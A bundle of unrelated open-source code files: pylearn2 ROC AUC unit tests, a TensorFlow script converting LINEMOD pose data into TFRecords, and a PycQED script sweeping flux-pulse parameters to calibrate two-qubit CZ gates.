'Total NoCs/Subthreshold Leakage': 0.0691322,
'Total NoCs/Subthreshold Leakage with power gating': 0.0259246}}
# pylearn2/train_extensions/tests/test_roc_auc.py (BouchardLab/pylearn2, BSD-3-Clause)
"""
Tests for ROC AUC.
"""
from pylearn2.config import yaml_parse
from pylearn2.testing.skip import skip_if_no_sklearn
def test_roc_auc():
"""Test RocAucChannel."""
skip_if_no_sklearn()
trainer = yaml_parse.load(test_yaml)
trainer.main_loop()
def test_roc_auc_one_vs_rest():
"""Test one vs. rest RocAucChannel."""
skip_if_no_sklearn()
trainer = yaml_parse.load(test_yaml_ovr)
trainer.main_loop()
def test_roc_auc_one_vs_one():
"""Test one vs. rest RocAucChannel."""
skip_if_no_sklearn()
trainer = yaml_parse.load(test_yaml_ovo)
trainer.main_loop()
test_yaml = """
!obj:pylearn2.train.Train {
dataset:
&train !obj:pylearn2.testing.datasets.random_one_hot_dense_design_matrix
{
rng: !obj:numpy.random.RandomState { seed: 1 },
num_examples: 10,
dim: 10,
num_classes: 2,
},
model: !obj:pylearn2.models.mlp.MLP {
nvis: 10,
layers: [
!obj:pylearn2.models.mlp.Sigmoid {
layer_name: h0,
dim: 10,
irange: 0.05,
},
!obj:pylearn2.models.mlp.Softmax {
layer_name: y,
n_classes: 2,
irange: 0.,
}
],
},
algorithm: !obj:pylearn2.training_algorithms.bgd.BGD {
monitoring_dataset: {
'train': *train,
},
batches_per_iter: 1,
monitoring_batches: 1,
termination_criterion: !obj:pylearn2.termination_criteria.And {
criteria: [
!obj:pylearn2.termination_criteria.EpochCounter {
max_epochs: 1,
},
!obj:pylearn2.termination_criteria.MonitorBased {
channel_name: train_y_roc_auc,
prop_decrease: 0.,
N: 1,
},
],
},
},
extensions: [
!obj:pylearn2.train_extensions.roc_auc.RocAucChannel {},
],
}
"""
test_yaml_ovr = """
!obj:pylearn2.train.Train {
dataset:
&train !obj:pylearn2.testing.datasets.random_one_hot_dense_design_matrix
{
rng: !obj:numpy.random.RandomState { seed: 1 },
num_examples: 10,
dim: 10,
num_classes: 3,
},
model: !obj:pylearn2.models.mlp.MLP {
nvis: 10,
layers: [
!obj:pylearn2.models.mlp.Sigmoid {
layer_name: h0,
dim: 10,
irange: 0.05,
},
!obj:pylearn2.models.mlp.Softmax {
layer_name: y,
n_classes: 3,
irange: 0.,
}
],
},
algorithm: !obj:pylearn2.training_algorithms.bgd.BGD {
monitoring_dataset: {
'train': *train,
},
batches_per_iter: 1,
monitoring_batches: 1,
termination_criterion: !obj:pylearn2.termination_criteria.And {
criteria: [
!obj:pylearn2.termination_criteria.EpochCounter {
max_epochs: 1,
},
!obj:pylearn2.termination_criteria.MonitorBased {
channel_name: train_y_roc_auc,
prop_decrease: 0.,
N: 1,
},
],
},
},
extensions: [
!obj:pylearn2.train_extensions.roc_auc.RocAucChannel {
channel_name_suffix: roc_auc-0vX,
positive_class_index: 0,
},
!obj:pylearn2.train_extensions.roc_auc.RocAucChannel {
channel_name_suffix: roc_auc-1vX,
positive_class_index: 1,
},
!obj:pylearn2.train_extensions.roc_auc.RocAucChannel {
channel_name_suffix: roc_auc-2vX,
positive_class_index: 2,
},
],
}
"""
test_yaml_ovo = """
!obj:pylearn2.train.Train {
dataset:
&train !obj:pylearn2.testing.datasets.random_one_hot_dense_design_matrix
{
rng: !obj:numpy.random.RandomState { seed: 1 },
num_examples: 10,
dim: 10,
num_classes: 3,
},
model: !obj:pylearn2.models.mlp.MLP {
nvis: 10,
layers: [
!obj:pylearn2.models.mlp.Sigmoid {
layer_name: h0,
dim: 10,
irange: 0.05,
},
!obj:pylearn2.models.mlp.Softmax {
layer_name: y,
n_classes: 3,
irange: 0.,
}
],
},
algorithm: !obj:pylearn2.training_algorithms.bgd.BGD {
monitoring_dataset: {
'train': *train,
},
batches_per_iter: 1,
monitoring_batches: 1,
termination_criterion: !obj:pylearn2.termination_criteria.And {
criteria: [
!obj:pylearn2.termination_criteria.EpochCounter {
max_epochs: 1,
},
!obj:pylearn2.termination_criteria.MonitorBased {
channel_name: train_y_roc_auc,
prop_decrease: 0.,
N: 1,
},
],
},
},
extensions: [
!obj:pylearn2.train_extensions.roc_auc.RocAucChannel {
channel_name_suffix: roc_auc-0v1,
positive_class_index: 0,
negative_class_index: 1,
},
!obj:pylearn2.train_extensions.roc_auc.RocAucChannel {
channel_name_suffix: roc_auc-0v2,
positive_class_index: 0,
negative_class_index: 2,
},
!obj:pylearn2.train_extensions.roc_auc.RocAucChannel {
channel_name_suffix: roc_auc-1v2,
positive_class_index: 1,
negative_class_index: 2,
},
],
}
"""
# src/preprocessing_scripts/generate_test_data.py (stevsics/attention_6d_pose, MIT)
import tensorflow as tf
import numpy as np
import os
import cv2
from pyrr import Quaternion
import copy
object_names = ['ape','cam','cat','duck','glue','iron','phone',
'benchvise','can','driller','eggbox','holepuncher','lamp']
object_names_occlusion = ['ape','cat','duck','glue','can','driller','eggbox','holepuncher']
object_indeces = [it for it in range(len(object_names))]
camera_intrinsic_matrix_syn = np.array([[700., 0., 320.],
[0., 700., 240.],
[0., 0., 1.]])
camera_intrinsic_matrix_real = np.array([[572.41140, 0. , 325.26110],
[0. , 573.57043, 242.04899],
[0. , 0. , 1. ]])
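The two intrinsic matrices above follow the standard pinhole model: a camera-frame point `p` maps to pixel coordinates via `K @ p` followed by division by the third component. A minimal sketch (the `project_point` helper is illustrative, not part of this script):

```python
import numpy as np

# Synthetic intrinsics from above: fx = fy = 700, principal point (320, 240).
K_syn = np.array([[700., 0., 320.],
                  [0., 700., 240.],
                  [0., 0., 1.]])

def project_point(K, p_cam):
    """Project a 3-D point in camera coordinates to (u, v) pixel coordinates."""
    u, v, w = K @ p_cam
    return u / w, v / w
```

A point on the optical axis, e.g. `(0, 0, 1)`, lands exactly on the principal point `(320, 240)`.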
R_init = np.array([
[1.0, 0.0, 0.0],
[0.0, 1.0, 0.0],
[0.0, 0.0, 1.0],
])
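The functions below use pyrr's `Quaternion.from_matrix` to turn the 3x3 rotation part of each pose into a quaternion. For reference, the same conversion can be sketched in plain NumPy; the helper name is made up here, and the `(x, y, z, w)` component order is an assumption mirroring pyrr's convention:

```python
import numpy as np

def rotmat_to_quat_xyzw(R):
    """Convert a 3x3 rotation matrix to a unit quaternion in (x, y, z, w) order."""
    t = np.trace(R)
    if t > 0.0:
        s = np.sqrt(t + 1.0) * 2.0  # s = 4 * w
        w = 0.25 * s
        x = (R[2, 1] - R[1, 2]) / s
        y = (R[0, 2] - R[2, 0]) / s
        z = (R[1, 0] - R[0, 1]) / s
    elif R[0, 0] > R[1, 1] and R[0, 0] > R[2, 2]:
        s = np.sqrt(1.0 + R[0, 0] - R[1, 1] - R[2, 2]) * 2.0  # s = 4 * x
        w = (R[2, 1] - R[1, 2]) / s
        x = 0.25 * s
        y = (R[0, 1] + R[1, 0]) / s
        z = (R[0, 2] + R[2, 0]) / s
    elif R[1, 1] > R[2, 2]:
        s = np.sqrt(1.0 + R[1, 1] - R[0, 0] - R[2, 2]) * 2.0  # s = 4 * y
        w = (R[0, 2] - R[2, 0]) / s
        x = (R[0, 1] + R[1, 0]) / s
        y = 0.25 * s
        z = (R[1, 2] + R[2, 1]) / s
    else:
        s = np.sqrt(1.0 + R[2, 2] - R[0, 0] - R[1, 1]) * 2.0  # s = 4 * z
        w = (R[1, 0] - R[0, 1]) / s
        x = (R[0, 2] + R[2, 0]) / s
        y = (R[1, 2] + R[2, 1]) / s
        z = 0.25 * s
    return np.array([x, y, z, w])
```

For the identity matrix this yields `(0, 0, 0, 1)`, and a 90-degree rotation about z yields `(0, 0, sqrt(0.5), sqrt(0.5))`.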
def save_tf_record_file(out_folder, it_tf_record, examples):
    """Write a list of tf.train.Example protos to a zero-padded, numbered .tfrecord file."""
tf_num = "%06d" % it_tf_record
tfrecord_file_out = os.path.join(out_folder, tf_num + '.tfrecord')
with tf.python_io.TFRecordWriter(tfrecord_file_out) as writer:
for it_save in range(len(examples)):
it_example = examples[it_save]
writer.write(it_example.SerializeToString())
return None
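The converter functions below flush accumulated examples through `save_tf_record_file` either once per image or after every 100 images (the `it_img % 100` check), plus a final flush for the remainder. The resulting shard sizes can be sketched without TensorFlow; `shard_sizes` is an illustrative helper, not part of this script:

```python
def shard_sizes(num_examples, shard_size=100):
    """Return the number of examples written to each .tfrecord shard, in order."""
    full, rem = divmod(num_examples, shard_size)
    return [shard_size] * full + ([rem] if rem else [])
```

For 250 images this gives shards of 100, 100, and 50 examples.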
def proccess_real_data_occlusion_linemod(in_folder_name, linemod_folder, init_pose_folder_name, out_folder_name, each_object_separate=False):
    """Convert Occlusion LINEMOD test images, ground-truth poses, and initial pose predictions into TFRecord shards."""
out_folder_name = os.path.join(out_folder_name, 'linemod_occlusion')
if not os.path.exists(out_folder_name):
os.mkdir(out_folder_name)
for it_obj in range(len(object_names)):
if not object_names[it_obj] in object_names_occlusion:
continue
print("Object name: " + object_names[it_obj] + ", object index num: " + str(it_obj))
folder_poses = os.path.join(in_folder_name, 'blender_poses', object_names[it_obj])
folder_images = os.path.join(in_folder_name, 'RGB-D', 'rgb_noseg')
out_folder_name_obj = os.path.join(out_folder_name, object_names[it_obj])
if not os.path.exists(out_folder_name_obj):
os.mkdir(out_folder_name_obj)
occlusion_test_file = os.path.join(linemod_folder, object_names[it_obj], 'test_occlusion.txt')
        inds = np.loadtxt(occlusion_test_file, dtype=str)
inds = [int(os.path.basename(ind).replace('.jpg', '')) for ind in inds]
it_tf_record = 0
examples = []
for it_img, it_indx in enumerate(inds):
if each_object_separate:
if not (len(examples) == 0):
print(it_img)
save_tf_record_file(out_folder_name_obj, it_tf_record, examples)
it_tf_record += 1
examples = []
else:
if (it_img % 100) == 0:
if not (len(examples) == 0):
print(it_img)
save_tf_record_file(out_folder_name_obj, it_tf_record, examples)
it_tf_record += 1
examples = []
it_obj_name_pose = "pose" + str(it_indx) + ".npy"
it_obj_name_img = "color_" + "%05d" % it_indx + ".png"
poses_file = os.path.join(folder_poses, it_obj_name_pose)
image_file = os.path.join(folder_images, it_obj_name_img)
pos = np.zeros((1, 3))
quat = np.zeros((1, 4))
if os.path.exists(poses_file):
data = np.load(poses_file)
else:
data = np.array([[1.0, 0.0, 0.0, 1.0],
[0.0, 1.0, 0.0, 1.0],
[0.0, 0.0, 1.0, 1.0], ])
R_mat = data[:3, :3]
pos[0, :] = data[:3, 3]
quat[0, :] = Quaternion.from_matrix(R_mat)
cls_indexes = [object_indeces[it_obj]]
cls_indexes_num = [1]
# read image
img_name = os.path.join(folder_images, image_file)
out_img = cv2.imread(img_name)
            encode_image = tf.compat.as_bytes(cv2.imencode(".png", out_img)[1].tobytes())
# read init pose
it_obj_name_init = "%06d" % it_img + "_predict.npy"
init_pose_file = os.path.join(init_pose_folder_name, object_names[it_obj], it_obj_name_init)
            predict_data = np.load(init_pose_file, allow_pickle=True).item()
Rt_mat_init = predict_data["pose_pred"]
R_mat_init = np.matmul(Rt_mat_init[:3, :3], R_init)
quat_init = Quaternion.from_matrix(R_mat_init)
pos_init = Rt_mat_init[:, 3]
if np.isnan(pos_init[0]):
pos_init = np.array([0.0, 0.0, 10.0])
quat_init = np.array([0.0, 0.0, 0.0, 1.0])
if np.linalg.norm(pos_init) > 10.0:
pos_init = np.array([0.0, 0.0, 10.0])
quat_init = np.array([0.0, 0.0, 0.0, 1.0])
num_of_objects = 13
K_init_all = np.zeros((num_of_objects, 3, 3))
for it_img_obj in range(num_of_objects):
K_init_all[it_img_obj, :, :] = copy.copy(camera_intrinsic_matrix_real)
feature = {
"init_pose": tf.train.Feature(float_list=tf.train.FloatList(value=pos_init)),
"init_quat": tf.train.Feature(float_list=tf.train.FloatList(value=quat_init)),
"cls_indexes": tf.train.Feature(int64_list=tf.train.Int64List(value=cls_indexes)),
"obj_num": tf.train.Feature(int64_list=tf.train.Int64List(value=cls_indexes_num)),
"pos": tf.train.Feature(float_list=tf.train.FloatList(value=pos.reshape(-1))),
"quat": tf.train.Feature(float_list=tf.train.FloatList(value=quat.reshape(-1))),
"img": tf.train.Feature(bytes_list=tf.train.BytesList(value=[encode_image])),
"K_init_all": tf.train.Feature(float_list=tf.train.FloatList(value=K_init_all.reshape(-1))),
}
tf_record_example = tf.train.Example(features=tf.train.Features(feature=feature))
examples.append(tf_record_example)
if not (len(examples) == 0):
save_tf_record_file(out_folder_name_obj, it_tf_record, examples)
def proccess_real_data_linemod(linemod_folder, init_pose_folder_name, out_folder_name, each_object_separate=False):
    """Convert LINEMOD test images, ground-truth poses, and initial pose predictions into TFRecord shards."""
out_folder_name = os.path.join(out_folder_name, 'linemod')
if not os.path.exists(out_folder_name):
os.mkdir(out_folder_name)
for it_obj in range(len(object_names)):
print("Object name: " + object_names[it_obj] + ", object index num: " + str(it_obj))
in_folder_name_obj = os.path.join(linemod_folder, object_names[it_obj])
folder_images = os.path.join(in_folder_name_obj, "JPEGImages")
in_folder_name_mask_obj = os.path.join(in_folder_name_obj, "mask")
folder_poses = os.path.join(in_folder_name_obj, "pose")
out_folder_name_obj = os.path.join(out_folder_name, object_names[it_obj])
if not os.path.exists(out_folder_name_obj):
os.mkdir(out_folder_name_obj)
occlusion_test_file = os.path.join(linemod_folder, object_names[it_obj], 'test.txt')
        inds = np.loadtxt(occlusion_test_file, dtype=str)
inds = [int(os.path.basename(ind).replace('.jpg', '')) for ind in inds]
it_tf_record = 0
examples = []
for it_img, it_indx in enumerate(inds):
if each_object_separate:
if not (len(examples) == 0):
print(it_img)
save_tf_record_file(out_folder_name_obj, it_tf_record, examples)
it_tf_record += 1
examples = []
else:
if (it_img % 100) == 0:
if not (len(examples) == 0):
print(it_img)
save_tf_record_file(out_folder_name_obj, it_tf_record, examples)
it_tf_record += 1
examples = []
it_obj_name_pose = "pose" + str(it_indx) + ".npy"
it_obj_name_img = "%06d" % it_indx + ".jpg"
poses_file = os.path.join(folder_poses, it_obj_name_pose)
image_file = os.path.join(folder_images, it_obj_name_img)
pos = np.zeros((1, 3))
quat = np.zeros((1, 4))
if os.path.exists(poses_file):
data = np.load(poses_file)
else:
data = np.array([[1.0, 0.0, 0.0, 1.0],
[0.0, 1.0, 0.0, 1.0],
[0.0, 0.0, 1.0, 1.0]])
R_mat = data[:3, :3]
pos[0, :] = data[:3, 3]
quat[0, :] = Quaternion.from_matrix(R_mat)
cls_indexes = [object_indeces[it_obj]]
cls_indexes_num = [1]
# read image
out_img = cv2.imread(image_file)  # image_file is already joined with folder_images above
encode_image = tf.compat.as_bytes(cv2.imencode(".png", out_img)[1].tobytes())  # tostring() is deprecated
# read init pose
it_obj_name_init = "%06d" % it_img + "_predict.npy"
init_pose_file = os.path.join(init_pose_folder_name, object_names[it_obj], it_obj_name_init)
predict_data = np.load(init_pose_file, allow_pickle='TRUE').item()
Rt_mat_init = predict_data["pose_pred"]
R_mat_init = np.matmul(Rt_mat_init[:3, :3], R_init)
quat_init = Quaternion.from_matrix(R_mat_init)
pos_init = Rt_mat_init[:, 3]
if np.isnan(pos_init[0]):
pos_init = np.array([0.0, 0.0, 10.0])
quat_init = np.array([0.0, 0.0, 0.0, 1.0])
if np.linalg.norm(pos_init) > 10.0:
pos_init = np.array([0.0, 0.0, 10.0])
quat_init = np.array([0.0, 0.0, 0.0, 1.0])
num_of_objects = 13
K_init_all = np.zeros((num_of_objects, 3, 3))
for it_img_obj in range(num_of_objects):
K_init_all[it_img_obj, :, :] = copy.copy(camera_intrinsic_matrix_real)
feature = {
"init_pose": tf.train.Feature(float_list=tf.train.FloatList(value=pos_init)),
"init_quat": tf.train.Feature(float_list=tf.train.FloatList(value=quat_init)),
"cls_indexes": tf.train.Feature(int64_list=tf.train.Int64List(value=cls_indexes)),
"obj_num": tf.train.Feature(int64_list=tf.train.Int64List(value=cls_indexes_num)),
"pos": tf.train.Feature(float_list=tf.train.FloatList(value=pos.reshape(-1))),
"quat": tf.train.Feature(float_list=tf.train.FloatList(value=quat.reshape(-1))),
"img": tf.train.Feature(bytes_list=tf.train.BytesList(value=[encode_image])),
"K_init_all": tf.train.Feature(float_list=tf.train.FloatList(value=K_init_all.reshape(-1))),
}
tf_record_example = tf.train.Example(features=tf.train.Features(feature=feature))
examples.append(tf_record_example)
if examples:
save_tf_record_file(out_folder_name_obj, it_tf_record, examples)
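The NaN and out-of-range guards applied to the initial pose above can be factored into a small helper. The sketch below mirrors that fallback logic; the names `sanitize_init_pose`, `DEFAULT_POS` and `DEFAULT_QUAT` are illustrative and not part of this codebase.

```python
import numpy as np

# fallback pose used by the script when the predicted pose is unusable
DEFAULT_POS = np.array([0.0, 0.0, 10.0])
DEFAULT_QUAT = np.array([0.0, 0.0, 0.0, 1.0])

def sanitize_init_pose(pos_init, quat_init, max_dist=10.0):
    """Replace NaN or implausibly distant initial poses with a fixed fallback."""
    pos_init = np.asarray(pos_init, dtype=float)
    if np.any(np.isnan(pos_init)) or np.linalg.norm(pos_init) > max_dist:
        return DEFAULT_POS.copy(), DEFAULT_QUAT.copy()
    return pos_init, np.asarray(quat_init, dtype=float)
```

Using one helper keeps the two separate `if` blocks in the loop from drifting out of sync.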
if __name__ == '__main__':
linemod_occlusion_folder = "../../resources/pvnet_data/OCCLUSION_LINEMOD"
linemod_folder = "../../resources/pvnet_data/LINEMOD"
out_folder = "../../resources/datasets"
init_pose_folder_name = "../../resources/pvnet_data/init_poses/occlusion"
proccess_real_data_occlusion_linemod(linemod_occlusion_folder, linemod_folder, init_pose_folder_name, out_folder,
each_object_separate=True)
init_pose_folder_name = "../../resources/pvnet_data/init_poses/linemod"
proccess_real_data_linemod(linemod_folder, init_pose_folder_name, out_folder, each_object_separate=True)
# ==== pycqed/measurement/Simultaneous_fine_landscape.py (nuttamas/PycQED_py3, MIT) ====
###########################################
# VCZ calibration (fine landscape) FLUX dance 1
###########################################
# Align flux pulses
swf2 = swf.flux_t_middle_sweep(fl_lm_tm = [flux_lm_X3, flux_lm_D8,
flux_lm_D6, flux_lm_X2],
which_gate= ['NE', 'SW',
'SW', 'NE'],
fl_lm_park = [flux_lm_Z1, flux_lm_D7, flux_lm_Z4],
speed_limit = [2.9583333333333334e-08,
2.75e-08])
swf2.set_parameter(4)
swf2 = swf.flux_t_middle_sweep(fl_lm_tm = [flux_lm_X1, flux_lm_D2],
which_gate= ['NE', 'SW'],
fl_lm_park = [flux_lm_D1],
speed_limit = [2.75e-08])
swf2.set_parameter(6)
file_cfg = gc.generate_config(in_filename=input_file,
out_filename=config_fn,
mw_pulse_duration=20,
ro_duration=2200,
flux_pulse_duration=60,
init_duration=200000)
# flux-dance 1
## input from user
pairs = [['X3', 'D8'], ['D6', 'X2'], ['X1', 'D2']]
which_gate= [['NE', 'SW'],['SW', 'NE'], ['NE', 'SW']]
parked_qubits = ['D7', 'Z1', 'Z4', 'D1']
cfg_amps = [0.28500000000000003,0.19302332066356387,0.25166666666666665]
## processed
flux_lms_target = [device.find_instrument("flux_lm_{}".format(pair[0]))\
for pair in pairs]
flux_lms_control = [device.find_instrument("flux_lm_{}".format(pair[1]))\
for pair in pairs]
flux_lms_park = [device.find_instrument("flux_lm_{}".format(qb))\
for qb in parked_qubits]
# set CZ parameters
for i,flux_lm_target in enumerate(flux_lms_target):
flux_lm_target.cfg_awg_channel_amplitude(cfg_amps[i])
flux_lm_target.set("vcz_amp_dac_at_11_02_{}".format(which_gate[i][0]), 0.5)
flux_lms_control[i].set("vcz_amp_dac_at_11_02_{}".format(which_gate[i][1]), 0)
# Set park parameters
for i,flux_lm_park in enumerate(flux_lms_park):
flux_lm_park.cfg_awg_channel_amplitude(.3)
flux_lm_park.park_amp(.5)
flux_lm_park.park_double_sided(True)
list_qubits_used = np.asarray(pairs).flatten().tolist()
which_gates = np.asarray(which_gate).flatten().tolist()
device.ro_acq_averages(1024)
device.ro_acq_digitized(False)
device.ro_acq_weight_type('optimal')
device.prepare_fluxing(qubits=parked_qubits)
device.prepare_for_timedomain(qubits=list_qubits_used)
from pycqed.measurement import cz_cost_functions as cf
conv_cost_det = det.Function_Detector(
get_function=cf.conventional_CZ_cost_func2,
msmt_kw={'device': device,
'MC': MC,
'pairs' : pairs,
'parked_qbs': parked_qubits,
'prepare_for_timedomain': False,
'disable_metadata': True,
'extract_only': True,
'flux_codeword': 'flux-dance-1',
'parked_qubit_seq': 'ground',
'include_single_qubit_phase_in_cost': False,
'target_single_qubit_phase': 360,
'include_leakage_in_cost': True,
'target_phase': 180,
'cond_phase_weight_factor': 2},
value_names=[f'cost_function_val_{pair}' for pair in pairs ] +
[f'delta_phi_{pair}' for pair in pairs ] +
[f'missing_fraction_{pair}' for pair in pairs ],
result_keys=[f'cost_function_val_{pair}' for pair in pairs ] +
[f'delta_phi_{pair}' for pair in pairs ] +
[f'missing_fraction_{pair}' for pair in pairs ],
value_units=['a.u.' for pair in pairs ] +
['deg' for pair in pairs ] +
['%' for pair in pairs ])
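The detector's `value_names` and `result_keys` are built by concatenating three list comprehensions, so the columns are grouped by quantity (all cost values, then all conditional phases, then all missing fractions) rather than by pair. A quick self-contained reconstruction of that ordering:

```python
# illustrative reconstruction of the value_names ordering used above
pairs = [['X3', 'D8'], ['D6', 'X2'], ['X1', 'D2']]
value_names = ([f'cost_function_val_{pair}' for pair in pairs]
               + [f'delta_phi_{pair}' for pair in pairs]
               + [f'missing_fraction_{pair}' for pair in pairs])
# indices 0-2: costs, 3-5: conditional phases, 6-8: missing fractions
```

The analysis code reading the detector output must assume this grouped ordering, not a per-pair interleaving.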
Sw_functions = [swf.FLsweep(flux_lm_target, flux_lm_target.parameters['vcz_amp_sq_{}'.format(gate[0])],
'cz_{}'.format(gate[0])) for flux_lm_target, gate in \
zip(flux_lms_target,which_gate)]
swf1 = swf.multi_sweep_function(Sw_functions, sweep_point_ratios= [1.2/3, 1, 1.2/3])
Sw_functions_2 = [swf.FLsweep(flux_lm_target, flux_lm_target.parameters['vcz_amp_fine_{}'.format(gate[0])],
'cz_{}'.format(gate[0])) for flux_lm_target, gate in \
zip(flux_lms_target,which_gate)]
swf2 = swf.multi_sweep_function(Sw_functions_2, sweep_point_ratios= [1, 1, 1])
MC.live_plot_enabled(True)
nested_MC.live_plot_enabled(True)
nested_MC.cfg_clipping_mode(True)
nested_MC.set_sweep_function(swf1)
nested_MC.set_sweep_function_2D(swf2)
nested_MC.set_sweep_points(np.linspace(.97, 1.03, 21))
nested_MC.set_sweep_points_2D(np.linspace(0, 1, 11))
label = 'VCZ_2D_{}_fine_sweep'.format(pairs)
nested_MC.set_detector_function(conv_cost_det)
result = nested_MC.run(label, mode='2D')
try:
ma2.Conditional_Oscillation_Heatmap_Analysis(label=label)
except Exception:
print('Failed Analysis')
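The detector is configured with `target_phase=180`, `cond_phase_weight_factor=2` and leakage included in the cost. A hypothetical sketch of such a weighted cost is shown below; the real `conventional_CZ_cost_func2` lives in `pycqed.measurement.cz_cost_functions` and differs in detail, so this is only an illustration of how those keyword arguments could combine.

```python
def cz_cost(cond_phase_deg, missing_fraction,
            target_phase=180.0, cond_phase_weight_factor=2.0,
            include_leakage_in_cost=True):
    """Toy cost: weighted conditional-phase error plus a leakage proxy."""
    # normalized phase error, scaled by the weight factor
    cost = cond_phase_weight_factor * abs(cond_phase_deg - target_phase) / 180.0
    if include_leakage_in_cost:
        cost += missing_fraction  # missing fraction stands in for leakage
    return cost
```

With this shape, a 10-degree phase error and no leakage costs about 0.11, so doubling the weight factor doubles the phase term's pull on the 2D landscape minimum.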
###########################################
# VCZ calibration (fine landscape) FLUX dance 2
###########################################
# Align flux pulses
swf2 = swf.flux_t_middle_sweep(fl_lm_tm = [flux_lm_X3, flux_lm_D7,
flux_lm_D5, flux_lm_X2,
flux_lm_X1, flux_lm_D1],
which_gate= ['NW', 'SE',
'SE', 'NW',
'NW', 'SE'],
fl_lm_park = [flux_lm_Z1, flux_lm_D8, flux_lm_Z4, flux_lm_D2],
speed_limit = [2.9583333333333334e-08,
2.4166666666666668e-08,
2.5416666666666666e-08])
swf2.set_parameter(5)
file_cfg = gc.generate_config(in_filename=input_file,
out_filename=config_fn,
mw_pulse_duration=20,
ro_duration=2200,
flux_pulse_duration=60,
init_duration=200000)
# flux-dance 2
## input from user
pairs = [['X3', 'D7'], ['D5', 'X2'], ['X1', 'D1']]
which_gate= [['NW', 'SE'],['SE', 'NW'], ['NW', 'SE']]
parked_qubits = ['D8', 'Z1', 'Z4', 'D2']
cfg_amps = [0.3242724012703858,0.16687470158591108,0.27975182997855896]
## processed
flux_lms_target = [device.find_instrument("flux_lm_{}".format(pair[0]))\
for pair in pairs]
flux_lms_control = [device.find_instrument("flux_lm_{}".format(pair[1]))\
for pair in pairs]
flux_lms_park = [device.find_instrument("flux_lm_{}".format(qb))\
for qb in parked_qubits]
# set CZ parameters
for i,flux_lm_target in enumerate(flux_lms_target):
flux_lm_target.cfg_awg_channel_amplitude(cfg_amps[i])
flux_lm_target.set("vcz_amp_dac_at_11_02_{}".format(which_gate[i][0]), 0.5)
flux_lms_control[i].set("vcz_amp_dac_at_11_02_{}".format(which_gate[i][1]), 0)
# Set park parameters
for i,flux_lm_park in enumerate(flux_lms_park):
flux_lm_park.cfg_awg_channel_amplitude(.3)
flux_lm_park.park_amp(.5)
flux_lm_park.park_double_sided(True)
list_qubits_used = np.asarray(pairs).flatten().tolist()
which_gates = np.asarray(which_gate).flatten().tolist()
device.ro_acq_averages(1024)
device.ro_acq_digitized(False)
device.ro_acq_weight_type('optimal')
device.prepare_fluxing(qubits=parked_qubits)
device.prepare_for_timedomain(qubits=list_qubits_used)
from pycqed.measurement import cz_cost_functions as cf
conv_cost_det = det.Function_Detector(
get_function=cf.conventional_CZ_cost_func2,
msmt_kw={'device': device,
'MC': MC,
'pairs' : pairs,
'parked_qbs': parked_qubits,
'prepare_for_timedomain': False,
'disable_metadata': True,
'extract_only': True,
'flux_codeword': 'flux-dance-2',
'parked_qubit_seq': 'ground',
'include_single_qubit_phase_in_cost': False,
'target_single_qubit_phase': 360,
'include_leakage_in_cost': True,
'target_phase': 180,
'cond_phase_weight_factor': 2},
value_names=[f'cost_function_val_{pair}' for pair in pairs ] +
[f'delta_phi_{pair}' for pair in pairs ] +
[f'missing_fraction_{pair}' for pair in pairs ],
result_keys=[f'cost_function_val_{pair}' for pair in pairs ] +
[f'delta_phi_{pair}' for pair in pairs ] +
[f'missing_fraction_{pair}' for pair in pairs ],
value_units=['a.u.' for pair in pairs ] +
['deg' for pair in pairs ] +
['%' for pair in pairs ])
Sw_functions = [swf.FLsweep(flux_lm_target, flux_lm_target.parameters['vcz_amp_sq_{}'.format(gate[0])],
'cz_{}'.format(gate[0])) for flux_lm_target, gate in \
zip(flux_lms_target,which_gate)]
swf1 = swf.multi_sweep_function(Sw_functions, sweep_point_ratios= [1.2/3, 1, 1.2/3])
Sw_functions_2 = [swf.FLsweep(flux_lm_target, flux_lm_target.parameters['vcz_amp_fine_{}'.format(gate[0])],
'cz_{}'.format(gate[0])) for flux_lm_target, gate in \
zip(flux_lms_target,which_gate)]
swf2 = swf.multi_sweep_function(Sw_functions_2, sweep_point_ratios= [1, 1, 1])
MC.live_plot_enabled(True)
nested_MC.live_plot_enabled(True)
nested_MC.cfg_clipping_mode(True)
nested_MC.set_sweep_function(swf1)
nested_MC.set_sweep_function_2D(swf2)
nested_MC.set_sweep_points(np.linspace(.95, 1.05, 41))
nested_MC.set_sweep_points_2D(np.linspace(0, 1, 21))
label = 'VCZ_2D_{}_fine_sweep'.format(pairs)
nested_MC.set_detector_function(conv_cost_det)
result = nested_MC.run(label, mode='2D')
try:
ma2.Conditional_Oscillation_Heatmap_Analysis(label=label)
except Exception:
print('Failed Analysis')
###########################################
# VCZ calibration (fine landscape) FLUX dance 3
###########################################
# Align flux pulses
swf2 = swf.flux_t_middle_sweep(fl_lm_tm = [flux_lm_D5, flux_lm_X3,
flux_lm_X2, flux_lm_D3],
which_gate= ['NW', 'SE',
'SE', 'NW'],
fl_lm_park = [flux_lm_Z1, flux_lm_Z4, flux_lm_D2],
speed_limit = [2.75e-08, 2.75e-8])
swf2.set_parameter(8)
swf2 = swf.flux_t_middle_sweep(fl_lm_tm = [flux_lm_X4, flux_lm_D9],
which_gate= ['SE', 'NW'],
fl_lm_park = [flux_lm_D8],
speed_limit = [2.75e-8])
swf2.set_parameter(5)
file_cfg = gc.generate_config(in_filename=input_file,
out_filename=config_fn,
mw_pulse_duration=20,
ro_duration=2200,
flux_pulse_duration=60,
init_duration=200000)
# flux-dance 3
pairs = [['X4', 'D9'], ['D5', 'X3'], ['X2', 'D3']]
which_gate= [['SE', 'NW'],['NW', 'SE'], ['SE', 'NW']]
parked_qubits = ['D8', 'Z1', 'Z4', 'D2']
cfg_amps = [] # input
## processed
flux_lms_target = [device.find_instrument("flux_lm_{}".format(pair[0]))\
for pair in pairs]
flux_lms_control = [device.find_instrument("flux_lm_{}".format(pair[1]))\
for pair in pairs]
flux_lms_park = [device.find_instrument("flux_lm_{}".format(qb))\
for qb in parked_qubits]
# set CZ parameters
for i,flux_lm_target in enumerate(flux_lms_target):
flux_lm_target.cfg_awg_channel_amplitude(cfg_amps[i])
flux_lm_target.set("vcz_amp_dac_at_11_02_{}".format(which_gate[i][0]), 0.5)
flux_lms_control[i].set("vcz_amp_dac_at_11_02_{}".format(which_gate[i][1]), 0)
# Set park parameters
for i,flux_lm_park in enumerate(flux_lms_park):
flux_lm_park.cfg_awg_channel_amplitude(.3)
flux_lm_park.park_amp(.5)
flux_lm_park.park_double_sided(True)
list_qubits_used = np.asarray(pairs).flatten().tolist()
which_gates = np.asarray(which_gate).flatten().tolist()
device.ro_acq_averages(1024)
device.ro_acq_digitized(False)
device.ro_acq_weight_type('optimal')
device.prepare_fluxing(qubits=parked_qubits)
device.prepare_for_timedomain(qubits=list_qubits_used)
